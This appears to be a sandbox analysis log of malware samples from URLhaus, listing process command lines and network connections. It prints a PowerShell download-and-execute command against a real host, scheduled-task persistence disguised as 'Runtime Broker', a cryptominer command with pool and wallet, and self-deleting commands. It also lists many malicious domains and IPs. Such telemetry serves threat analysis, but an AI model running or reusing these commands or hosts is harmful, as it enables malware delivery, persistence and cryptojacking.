C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DGDAEHCBGIIJ" & exit

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
N/A 127.0.0.1:60079 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 cdn.chuk.cz udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
CH 138.188.36.82:80 138.188.36.82 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
DE 62.216.196.186:80 62.216.196.186 tcp
HK 219.77.72.53:80 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
IT 93.47.199.117:80 93.47.199.117 tcp
TW 122.116.26.47:4080 122.116.26.47 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
TW 122.116.26.47:8443 122.116.26.47 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
CN 49.81.203.0:111 tcp
KR 222.104.204.78:8000 222.104.204.78 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
KR 59.19.185.137:8602 59.19.185.137 tcp
CN 47.103.126.166:8072 tcp
ES 37.13.48.49:80 37.13.48.49 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
KR 121.154.20.150:80 121.154.20.150 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
KR 14.37.138.88:8602 14.37.138.88 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
NL 85.31.47.135:80 85.31.47.135 tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
BG 87.121.86.206:80 87.121.86.206 tcp
BG 87.121.86.206:443 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 158.101.35.62:9000 158.101.35.62 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 security-service-api-link.cc udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 win-network-checker.cc udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 utorrent-backup-server5.top udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
US 172.67.204.246:443 cdn.chuk.cz tcp
US 8.8.8.8:53 update-checker-status.cc udp
CN 117.50.194.20:80 tcp
CN 60.29.43.10:8072 tcp
ES 178.156.109.69:81 178.156.109.69 tcp
KR 112.217.207.130:80 112.217.207.130 tcp
CN 36.138.125.70:8089 tcp
JP 115.37.8.16:80 115.37.8.16 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
DO 181.36.153.151:81 181.36.153.151 tcp
NL 194.122.165.149:80 194.122.165.149 tcp
JP 18.181.154.24:80 18.181.154.24 tcp
NL 194.122.191.15:90 194.122.191.15 tcp
ES 94.76.156.101:280 94.76.156.101 tcp
NL 83.87.76.41:80 83.87.76.41 tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
US 8.8.8.8:53 cfs7.blog.daum.net udp
BG 87.121.86.16:80 update-checker-status.cc tcp
US 8.8.8.8:53 qiniuyunxz.yxflzs.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 206.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 135.47.31.85.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 89.103.15.80.in-addr.arpa udp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 186.196.216.62.in-addr.arpa udp
US 8.8.8.8:53 117.199.47.93.in-addr.arpa udp
US 8.8.8.8:53 220.34.188.138.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 49.48.13.37.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 1.98.145.166.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 246.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 41.76.87.83.in-addr.arpa udp
US 8.8.8.8:53 69.109.156.178.in-addr.arpa udp
US 8.8.8.8:53 101.156.76.94.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 82.36.188.138.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 monastery.mlnk.net udp
US 8.8.8.8:53 download.caihong.com udp
US 8.8.8.8:53 www.xn--on3b15m2lco2u.com udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 192.224.89.179.in-addr.arpa udp
US 8.8.8.8:53 15.191.122.194.in-addr.arpa udp
US 8.8.8.8:53 117.60.175.202.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 151.153.36.181.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 237.127.142.121.in-addr.arpa udp
US 8.8.8.8:53 137.185.19.59.in-addr.arpa udp
US 8.8.8.8:53 78.204.104.222.in-addr.arpa udp
US 8.8.8.8:53 47.26.116.122.in-addr.arpa udp
US 8.8.8.8:53 155.49.250.167.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 88.138.37.14.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
US 8.8.8.8:53 24.154.181.18.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 16.8.37.115.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 130.207.217.112.in-addr.arpa udp
CZ 77.240.97.71:81 77.240.97.71 tcp
CN 183.60.150.17:80 qiniuyunxz.yxflzs.com tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
BG 88.213.212.10:80 monastery.mlnk.net tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
KR 211.231.99.68:80 cfs7.blog.daum.net tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
CN 111.6.202.202:80 download.caihong.com tcp
KR 221.139.49.8:80 www.xn--on3b15m2lco2u.com tcp
US 8.8.8.8:53 71.97.240.77.in-addr.arpa udp
US 8.8.8.8:53 10.212.213.88.in-addr.arpa udp
US 8.8.8.8:53 8.49.139.221.in-addr.arpa udp
US 8.8.8.8:53 68.99.231.211.in-addr.arpa udp
US 8.8.8.8:53 149.165.122.194.in-addr.arpa udp
HK 43.132.12.146:9000 43.132.12.146 tcp
US 8.8.8.8:53 cd.textfiles.com udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
US 8.8.8.8:53 frojbdawmiojfg.sytes.net udp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
CN 47.94.196.131:80 tcp
TH 103.230.121.82:80 103.230.121.82 tcp
US 8.8.8.8:53 update.cg100iii.com udp
JP 141.147.155.36:8888 141.147.155.36 tcp
US 208.86.224.90:80 cd.textfiles.com tcp
VN 103.110.33.188:80 103.110.33.188 tcp
CA 50.65.169.30:81 50.65.169.30 tcp
GB 163.181.154.238:80 update.cg100iii.com tcp
US 8.8.8.8:53 82.121.230.103.in-addr.arpa udp
US 8.8.8.8:53 238.154.181.163.in-addr.arpa udp
US 8.8.8.8:53 90.224.86.208.in-addr.arpa udp
US 8.8.8.8:53 30.169.65.50.in-addr.arpa udp
US 8.8.8.8:53 36.155.147.141.in-addr.arpa udp
US 8.8.8.8:53 188.33.110.103.in-addr.arpa udp
TH 58.137.135.190:8080 58.137.135.190 tcp
US 8.8.8.8:53 190.135.137.58.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 pivko.sbs udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 113.106.6.106:14319 tcp
US 8.8.8.8:53 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net udp
US 8.8.8.8:53 ns.smallsrv.com udp
US 8.8.8.8:53 paytest.infinitegalaxy.cn udp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 137.8.203.116.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 112.33.27.73:443 tcp
CN 112.124.28.233:5566 tcp
US 8.8.8.8:53 down.pcclear.com udp
US 8.8.8.8:53 360down7.miiyun.cn udp
DE 116.203.8.137:443 pivko.sbs tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
RU 46.17.104.173:80 ns.smallsrv.com tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
US 8.8.8.8:53 epei77.direct.quickconnect.to udp
US 8.8.8.8:53 47.159.31.82.in-addr.arpa udp
US 8.8.8.8:53 173.104.17.46.in-addr.arpa udp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.187.206:443 docs.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 68.108.119.30:22420 68.108.119.30 tcp
US 8.8.8.8:53 nerve.untergrund.net udp
KR 211.110.226.148:80 down.pcclear.com tcp
CN 218.12.76.158:80 360down7.miiyun.cn tcp
CN 47.120.46.210:80 tcp
CN 110.40.32.156:80 qiniuyunxz.yxflzs.com tcp
CN 111.6.201.155:80 download.caihong.com tcp
US 8.8.8.8:53 server.toeicswt.co.kr udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 30.119.108.68.in-addr.arpa udp
US 8.8.8.8:53 148.226.110.211.in-addr.arpa udp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
KR 218.147.147.172:80 epei77.direct.quickconnect.to tcp
DE 116.203.8.137:443 pivko.sbs tcp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 172.147.147.218.in-addr.arpa udp
VN 103.167.89.125:80 103.167.89.125 tcp
US 8.8.8.8:53 1717.1000uc.com udp
CN 203.2.65.29:8088 tcp
US 8.8.8.8:53 elisans.novayonetim.com udp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
US 8.8.8.8:53 media.githubusercontent.com udp
US 8.8.8.8:53 safe.ywxww.net udp
US 8.8.8.8:53 utorrent-backup-server.top udp
US 8.8.8.8:53 www.333zz.top udp
KR 221.143.49.222:80 221.143.49.222 tcp
US 24.93.22.147:8081 24.93.22.147 tcp
US 166.166.188.230:80 166.166.188.230 tcp
AT 81.10.240.105:80 81.10.240.105 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
CN 49.232.126.36:9000 tcp
US 68.178.207.33:8000 68.178.207.33 tcp
MA 102.53.15.54:80 102.53.15.54 tcp
IN 43.240.65.55:81 43.240.65.55 tcp
DE 146.0.42.82:80 146.0.42.82 tcp
CN 106.42.31.65:8088 tcp
KW 178.61.160.6:5001 178.61.160.6 tcp
CN 42.193.42.92:80 tcp
DE 185.254.96.92:80 185.254.96.92 tcp
US 8.8.8.8:53 a12xxx1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 osecweb.ir udp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 a19ccc1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 karoonpc.com udp
US 8.8.8.8:53 src1.minibai.com udp
US 8.8.8.8:53 desquer.ens.uabc.mx udp
US 8.8.8.8:53 82.42.0.146.in-addr.arpa udp
US 8.8.8.8:53 92.96.254.185.in-addr.arpa udp
US 8.8.8.8:53 54.15.53.102.in-addr.arpa udp
US 8.8.8.8:53 105.240.10.81.in-addr.arpa udp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 8.8.8.8:53 147.22.93.24.in-addr.arpa udp
US 8.8.8.8:53 6.160.61.178.in-addr.arpa udp
US 8.8.8.8:53 33.207.178.68.in-addr.arpa udp
US 8.8.8.8:53 230.188.166.166.in-addr.arpa udp
US 8.8.8.8:53 125.89.167.103.in-addr.arpa udp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 170.250.53.236:80 170.250.53.236 tcp
DE 185.88.60.242:80 nerve.untergrund.net tcp
KR 210.116.108.238:80 server.toeicswt.co.kr tcp
US 8.8.8.8:53 softdl.360tpcdn.com udp
US 8.8.8.8:53 www.maxmoney.com udp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 242.60.88.185.in-addr.arpa udp
US 8.8.8.8:53 d.kpzip.com udp
US 8.8.8.8:53 236.53.250.170.in-addr.arpa udp
US 8.8.8.8:53 238.108.116.210.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
UA 185.156.72.65:80 185.156.72.65 tcp
US 8.8.8.8:53 65.72.156.185.in-addr.arpa udp
US 8.8.8.8:53 cdn.ly.9377.com udp
NL 4.180.120.64:8000 4.180.120.64 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 64.120.180.4.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 global.pcclear.com udp
KR 114.108.160.134:80 global.pcclear.com tcp
N/A 127.0.0.1:9223 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 166.150.43.236:80 166.150.43.236 tcp
US 185.199.109.133:443 media.githubusercontent.com tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
HK 47.79.66.205:80 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
TR 176.53.14.120:80 elisans.novayonetim.com tcp
GB 79.133.176.178:80 1717.1000uc.com tcp
HK 47.79.66.211:443 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
IR 217.172.98.87:443 karoonpc.com tcp
IR 185.79.156.69:80 osecweb.ir tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
CN 140.210.18.161:88 www.333zz.top tcp
CN 116.131.226.94:80 src1.minibai.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
MY 210.19.94.140:443 www.maxmoney.com tcp
US 104.192.108.20:80 softdl.360tpcdn.com tcp
US 74.64.155.4:9090 74.64.155.4 tcp
US 170.55.7.234:80 170.55.7.234 tcp
CN 139.198.15.223:8080 tcp
HK 103.59.103.198:80 103.59.103.198 tcp
CN 123.235.29.162:6713 tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 178.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 69.156.79.185.in-addr.arpa udp
US 8.8.8.8:53 87.98.172.217.in-addr.arpa udp
US 8.8.8.8:53 236.43.150.166.in-addr.arpa udp
US 8.8.8.8:53 3.192.231.148.in-addr.arpa udp
US 8.8.8.8:53 211.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 205.66.79.47.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 xss-1253555722.cos.ap-singapore.myqcloud.com udp
CN 1.189.232.62:80 d.kpzip.com tcp
RU 176.111.174.140:443 tcp
US 8.8.8.8:53 dow.andylab.cn udp
US 8.8.8.8:53 4.155.64.74.in-addr.arpa udp
US 8.8.8.8:53 234.7.55.170.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 198.103.59.103.in-addr.arpa udp
US 8.8.8.8:53 140.94.19.210.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
HK 134.122.129.18:80 134.122.129.18 tcp
GB 163.181.154.237:80 cdn.ly.9377.com tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
US 8.8.8.8:53 140.174.111.176.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
BR 187.115.56.93:80 187.115.56.93 tcp
EC 186.3.78.195:80 186.3.78.195 tcp
US 8.8.8.8:53 www.teknoarge.com udp
RU 77.72.254.210:17017 77.72.254.210 tcp
US 8.8.8.8:53 artemka.spb.ru udp
IN 180.150.240.238:80 180.150.240.238 tcp
US 8.8.8.8:53 storage.soowim.co.kr udp
US 8.8.8.8:53 alien-training.com udp
US 8.8.8.8:53 237.154.181.163.in-addr.arpa udp
US 8.8.8.8:53 18.129.122.134.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 210.254.72.77.in-addr.arpa udp
US 8.8.8.8:53 238.240.150.180.in-addr.arpa udp
US 8.8.8.8:53 195.78.3.186.in-addr.arpa udp
US 8.8.8.8:53 93.56.115.187.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
CN 61.163.161.171:80 download.caihong.com tcp
CN 120.52.95.247:80 360down7.miiyun.cn tcp
CN 122.228.207.55:80 qiniuyunxz.yxflzs.com tcp
SG 43.152.64.193:80 xss-1253555722.cos.ap-singapore.myqcloud.com tcp
CN 116.142.249.98:80 dow.andylab.cn tcp
US 8.8.8.8:53 139520.aioc.qbgxl.com udp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 8.8.8.8:53 static.trafficjunky.com udp
US 8.8.8.8:53 ei.phncdn.com udp
US 206.217.142.166:1234 tcp
GB 64.210.156.18:443 ei.phncdn.com tcp
GB 64.210.156.18:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
